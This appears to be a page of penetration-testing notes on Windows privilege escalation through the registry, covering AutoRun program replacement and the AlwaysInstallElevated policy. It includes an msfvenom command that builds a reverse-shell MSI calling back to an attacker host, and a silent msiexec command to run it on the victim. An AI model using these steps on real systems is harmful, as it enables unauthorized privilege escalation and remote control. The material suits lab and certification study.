Registry
AUTORUN:
You will get a list of AutoRun programs from your enumeration scripts. It is shown under AutoRun applications in winPEAS. Check if those programs have RW access. Create a malicious executable of the AutoRun program and replace the original one. This however requires a restart of the machine for the AutoRun to give you a shell. This means that, you will only get a shell when the Administrator logs into his account. The administrator receives a prompt to run a program. Once he accepts the prompt, you will get a reverse shell.
ALWAYS INSTALL ELEVATED:
There are packages in Windows called msi packages. Msi packages are basically Windows installers. For the exploit to work, you need to have 2 registry settings enabled.
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
Check for both if AlwaysInstallElevated is set to 1.
METHOD 1:
Run PowerUp.ps1 and use the Abuse function to add a user or perform some other task
METHOD 2:
Create a metasploit reverse shell. Transfer it to the machine. Run it.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f msi -o shell.msi
#Transfer it to victim machine and run:
msiexec /quiet /qn /i C:\Temp\setup.msiMETHOD 3:
REGSVC:
winPEAS: Looking if you can modify any service registry
Last updated
Was this helpful?